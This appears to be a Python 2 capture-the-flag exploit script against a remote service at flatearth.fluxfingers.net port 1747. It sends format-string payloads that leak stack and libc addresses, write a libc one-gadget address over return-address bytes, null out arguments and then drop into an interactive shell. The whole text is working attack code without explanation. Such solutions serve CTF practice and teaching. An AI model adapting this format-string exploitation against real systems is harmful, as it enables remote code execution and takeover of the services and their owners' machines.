import phun import sys off = 0x71 off2 =0x31 #r = phun.Remote('192.168.122.234',1234) #raw_input('e') r = phun.Remote('flatearth.fluxfingers.net',1747) r.read(' is ') b=ord(r.read(1)) r.read('?') xbyte= off + b if xbyte > 0xff: print '[-] sorry :(' sys.exit(1) r.write('%' + str(int(xbyte))+ 'c%6$hhn'+ '|%p|' * 100 + "\n") leak = r.read('My fav') leak = leak.split('||') stack_r = int(leak[8],16)+0xb0-8 stack_x = int(leak[4],16) stack_a = int(leak[45],16) libc = int(leak[15],16) - 0x20830 oneshot = libc + 0x4526A #p1 = '%' + str(int(xbyte))+ 'c%6$hhn' base = stack_a& 0xff for i in range(15): if i % 2: base +=1 b = base idx = 13 else: b = 0 if i > 16 else (oneshot>>(8*(i/2)))&0xff idx = [65,55,63,71,79,87,95,103,3][(i/2)] p = '' r.read('?') bb = (stack_r) & 0xffff p += '%' + str(bb) + 'c%6$hn' bb = bb&0xff if bb > b: b = (0x100 + b)-bb else: b = b - bb # print idx,hex(b) p +='%' + str(b) + 'c%' + str(idx) +'$hhn' p += "\n" r.write(p) stack_r -= 0x20 print '[*] one-shot setted up' base = (stack_a + 0x38)&0xffff for i in range(4): if i % 2: b = 0 idx = [111,119][(i/2)] else: b = base base += 4 idx = 13 r.read('?') p = '' bb = (stack_r) & 0xffff if not b: p +='%' + str(idx) +'$n' p += '%' + str(bb) + 'c%6$hn' else: p += '%' + str(bb) + 'c%6$hn' b = b - bb p +='%' + str(b) + 'c%' + str(idx) +'$hn' p += "\n" r.write(p) stack_r -= 0x20 print '[*] arg nulled out' r.read('?') bb = (stack_a & 0xffff) - 8 r.write('%' + str(bb) + 'c%6$hn|\n') r.read('|') print '[+] shell?' r.shell()